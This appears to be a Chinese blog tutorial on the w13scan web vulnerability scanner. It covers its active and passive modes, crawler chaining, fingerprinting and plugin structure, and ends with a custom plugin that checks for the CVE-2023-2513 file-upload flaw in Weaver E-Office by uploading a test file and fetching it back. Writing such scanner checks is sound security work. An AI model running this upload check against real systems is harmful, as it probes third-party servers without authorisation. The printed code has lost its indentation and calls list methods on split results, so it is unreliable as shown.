W13SCAN的使用和扫描模块的编写
简介w13scan 是基于Python3的一款开源的Web漏洞发现工具,支持主动扫描模式和被动扫描模式,能运行在Windows、Linux、Mac上。
项目地址为:https://github.com/w-digital-scanner/w13scan
使用方法
主动扫描
w13scan不具备爬虫功能,只会在给定的url的上进行解析,然后调用所有的扫描插件进行扫描。
Python ./w13scan.py -u--html
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921085707581-1557345521.png
在扫描过程中会即时输出扫描到的漏洞信息,与此同时会将漏洞详情报告输出到
w13scan/W13SCAN/output/[日期]/[时间戳].json
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921085748410-1965071540.png
Json格式的输出更有利于二次开发,w13scan也可以生成更易阅读的html报告。如果执行命令时使用--html选项,就会将html格式的报告输出到
w13scan/W13SCAN/output/[日期]/[时间戳].html
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921085832415-1113414431.png
被动扫描
被动扫描是指在进行手动测试的过程中,代理将流量转发给漏洞扫描器,然后再进行漏洞检测。被动扫描不进行大规模的爬虫爬取行为,不主动爬取站点链接,而是通过流量、代理等方式去采集测试数据源。Burpsuite中使用Passive Scan Client插件将请求发送到被动扫描器中。
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921085919123-446370365.png
W13scan使用-s选项,指定被动扫描监听的端口:
python3 w13scan.py -s 127.0.0.1:7778 --html
然后在burpsuite中使用Passive Scan Client将流量发送到7778端口:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921090045427-835551811.png
在浏览器中浏览渗透目标站点:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921090523185-262505199.png
被动扫描+爬虫
w13scan没有爬虫功能,但被动扫描可以很好的与其他爬虫配合。将爬虫的流量代理到w13scan的被动扫描监听端口即可:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921090608015-903064696.png
Crawlergo是一款go语言开发的开源爬虫,使用chrome headless模式进行URL收集的浏览器爬虫。它对整个网页的关键位置与DOM渲染阶段进行HOOK,自动进行表单填充并提交,配合智能的JS事件触发,尽可能的收集网站暴露出的入口。
将crawergo的爬取流量发送到w13scan代理中:
./crawlergo -c path/to/chomium -t 10 --request-proxy http://127.0.0.1:7777 [目标url]
效果如下:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921090822991-539281634.png
扫描过程
对于给定的一个url,扫描器会先调用所有的指纹识别插件,尝试识别出目标使用的框架、操作系统、编程语言和中间件。然后将url按层次解析,对url中出现的文件、路径、域名分别调用扫描插件。
指纹识别
W13scan的指纹识别脚本位于fingerprints目录中:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921090920364-42648374.png
以对java编程语言的识别脚本为例,位于w13scan/W13SCAN/fingerprints/programing/Java.py
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921090952912-1533757968.png
W13scan会尝试在返回包的set-cookie中寻找JSESSIONID关键字,若存在则会认为目标web用java编写。若满足多个指纹可返回一个列表。
扫描插件
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921091026575-2051587125.png
scanners目录为扫描插件库,每个目录的插件会处理不同情形
[*]PerFile 针对URL所访问的文件的插件,会考虑查询参数
[*]PerFolder 针对URL中出现的目录的插件,会分层分别访问
[*]PerServer 针对URL所指domain的插件
PerFile中包含了对sql注入、shiro反序列化等漏洞的检测插件。PerFolder和PerServer中主要包含信息泄露检测插件。
以-u选项指定一个url进行扫描为例:
Python w13scan -u http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1
w13scan会在初始化之后,会调用loader插件来分析该url,可以从Main函数中看到这一过程:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921091056065-1209067699.png
上述命令会将url解析为:
PerFile :http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1
PerServer :http://127.0.0.1
PerFolder :http://127.0.0.1/dvwa/vulnerabilities/
PerFolder :http://127.0.0.1/dvwa/
PerFolder :http://127.0.0.1/
PerFolder :http://127.0.0.1/dvwa/vulnerabilities/sqli/
然后loader插件会调用PerFile目录下的所有插件针对
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1
接着调用PerFolder下的所有插件攻击
http://127.0.0.1/dvwa/vulnerabilities/、http://127.0.0.1/dvwa/、http://127.0.0.1/
最后调用PerServer目录下的插件攻击
http://127.0.0.1
只有loader插件会创建新的任务,包括目录遍历等,因此w13scan不具备爬虫功能,只会针对给定url通过loader插件进行解析,然后调用所有的插件进行检测。整个过程示意图如下:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921091124738-369852097.png
扩展扫描插件
W13scan扫描器内置了一些扫描插件:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921091207953-1491112501.png
增加对新漏洞的识别插件只需要在scanner文件夹下添加脚本。为了扩展新的扫描模块,我们可以观察一下scanner下正常的扫描模块文件长什么样子:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2020/5/10 9:02 PM
# @Author: w8ay
# @File : backup_file.py
import os
import requests
from lib.core.common import generateResponse
from lib.core.enums import VulType, PLACE
from lib.core.plugins import PluginBase
class W13SCAN(PluginBase):
name = '基于文件的备份文件'
desc = '''扫描基于文件的备份文件'''
def _check(self, content):
"""
根据给定的url,探测远程服务器上是存在该文件
文件头识别
* rar:526172211a0700cf9073
* zip:504b0304140000000800
* gz:1f8b080000000000000b,也包括'.sql.gz',取'1f8b0800' 作为keyword
* tar.gz: 1f8b0800
* mysqldump: -- MySQL dump: 2d2d204d7953514c
* phpMyAdmin: -- phpMyAdmin SQL Dump: 2d2d207068704d794164
* navicat: /* Navicat : 2f2a0a204e617669636174
* Adminer: -- Adminer x.x.x MySQL dump: 2d2d2041646d696e6572
* Navicat MySQL Data Transfer: /* Navicat: 2f2a0a4e617669636174
* 一种未知导出方式: -- -------: 2d2d202d2d2d2d2d2d2d
:param target_url:
:return:
"""
features = [b'\x50\x4b\x03\x04', b'\x52\x61\x72\x21',
b'\x2d\x2d\x20\x4d', b'\x2d\x2d\x20\x70\x68', b'\x2f\x2a\x0a\x20\x4e',
b'\x2d\x2d\x20\x41\x64', b'\x2d\x2d\x20\x2d\x2d', b'\x2f\x2a\x0a\x4e\x61']
for i in features:
if content.startswith(i):
return True
return False
def audit(self):
headers = self.requests.headers
url = self.requests.url
a, b = os.path.splitext(url)
if not b:
return
payloads = []
payloads.append(a + ".bak")
payloads.append(a + ".rar")
payloads.append(a + ".zip")
payloads.append(url + ".bak")
payloads.append(url + ".rar")
payloads.append(url + ".zip")
# http://xxxxx.com/index.php => index.php.bak index.bak index.rar
for payload in payloads:
r = requests.get(payload, headers=headers, allow_redirects=False)
if r.status_code == 200:
try:
content = r.raw.read(10)
except:
continue
if self._check(content) or "application/octet-stream" in r.headers.get("Content-Type", ''):
rarsize = int(r.headers.get('Content-Length', 0)) // 1024 // 1024
result = self.new_result()
result.init_info(self.requests.url, "备份文件下载", VulType.BRUTE_FORCE)
result.add_detail("payload请求", r.reqinfo, content.decode(errors='ignores'),
"备份文件大小:{}M".format(rarsize), "", "", PLACE.GET)
self.success(result)W13scan会调用脚本的audit函数,我们要做的就是修改auditor函数,将要做的扫描操作写在audit函数中,然后将扫描结果通过w13scan的init_info和add_detail方法返回。
这里我们将编写“cve-2023-2513泛微 E-Office 文件上传漏洞”的扫描模块,关于该漏洞的祥光细节,可以参考如下资料:
POC:
https://githubfast.com/RCEraser/cve/blob/main/Weaver.md
复现博客:
https://blog.csdn.net/qq_41904294/article/details/130832416
该漏洞检测分为两步,首先发送文件上传请求,然后发送请求检测上传文件是否成功。我们只需要复制一份backfile.py插件作为模板,修改audit函数,上面的POC写进audit中即可:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921092815679-1606718636.png
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921095210906-1355375301.png
import os
import requests
from lib.core.common import generateResponse
from lib.core.enums import VulType, PLACE
from lib.core.plugins import PluginBase
from urllib.parse import urlparse
class W13SCAN(PluginBase):
name = 'Weaver_E-Office_fileupload_2023-2513'
desc = '''cve-2023-2513 泛微 E-Office 文件上传漏洞'''
def audit(self):
headers = self.requests.headers
url = self.requests.url
headers['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
headers['Accept-Encoding'] = "gzip, deflate"
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0"
parsed_url = urlparse(url)
base_url = parsed_url.scheme +'://'+parsed_url.netloc
vuln_path = "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save"
vul_url = base_url + vuln_path
she = """hiword123"""
file = {"upload_quwan": ("abc.txt", she,"image/jpeg"),
"file":("","","application/octet-stream")}
resp1 = requests.post(url=vul_url, verify=False, allow_redirects=False, timeout=4, headers=headers, files=file,)
if resp1.status_code == 200:
try:
content = resp1.raw.read()
except:
pass
if "attachment" in resp1.text:
file_id = resp1.text.split(',')
file_name = resp1.text.split(',')
file_path = resp1.text.split(',').replace('\\','').strip('"')
file_url = base_url+'/'+'/'.join(file_path.split('/'))
# print(file_path.split('/'))
print(file_url)
resp2 = requests.get(url=file_url, verify=False, allow_redirects=False, timeout=4, )
# print(resp2.text)
if she in resp2.text:
flag = True
result = self.new_result()
result.init_info(self.requests.url, "CVE-2023-2513 泛微OA E-Office 文件上传", VulType.CMD_INNJECTION)
result.add_detail("payload请求", resp1.reqinfo, content.decode(errors='ignores'),
"上传点::{}".format(file_url), "", "", PLACE.POST)
self.success(result)测试扩展的扫描插件
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921093012390-1152469497.png
查看html漏洞报告
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921093158478-1835257018.png
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921093329856-576374665.png
可以看到,w13scan的框架为我们做了很多工作,在init_info和add_detial中添加的信息会在扫描过程中在终端显示,也会生成精美的html报告。
API
w13scan下的api目录开放了一些函数,__all__中导出的函数对开发者开放性不高。作者仅提供了一个调用单独扫描插件的api函数scan,调用该函数可以用module_name指定扫描插件进行扫描:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921093545175-756362209.png
调用scan进行扫描:
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921093620955-818200582.png
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921093642006-1497597638.png
扫描结果也会生成html报告
https://img2023.cnblogs.com/blog/1725533/202309/1725533-20230921093716274-2047737291.png
参考资料
爬虫联动:
https://www.freebuf.com/sectool/252790.html
https://github.com/Qianlitp/crawlergo/
W13scan作者的博客:
https://x.hacking8.com/tag/w13scan
模块编写的相关资料:
https://zhuanlan.zhihu.com/p/334625348
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]